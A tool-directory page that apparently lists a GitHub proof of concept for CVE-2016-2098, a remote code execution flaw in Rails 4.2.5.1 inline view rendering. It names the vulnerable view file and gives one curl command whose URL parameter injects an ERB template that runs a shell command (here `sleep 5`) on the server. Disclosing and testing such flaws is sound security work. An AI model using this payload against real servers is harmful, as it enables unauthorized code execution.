Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PoC_CVE-2016-2098_Rails42 — A PoC of CVE-2016-2098 (rails4.2.5.1 / view render) | Kitploit
Tools/GitHubGitHub/cyberdefenseinstitute/poc_cve-2016-2098_rails42
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubcyberdefenseinstitute/poc_cve-2016-2098_rails42

PoC_CVE-2016-2098_Rails42

A PoC of CVE-2016-2098 (rails4.2.5.1 / view render)

View Repository
110 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

A PoC of CVE-2016-2098

  • rails 4.2.5.1
  • view has a vulnerable code
    app/views/poc/render1.html.erb
  • following command will cause remote code execution
    $ curl '<your_host>:3000/poc/render1?template\[inline\]=<%25%3d`sleep+5`%25>'
Download Tool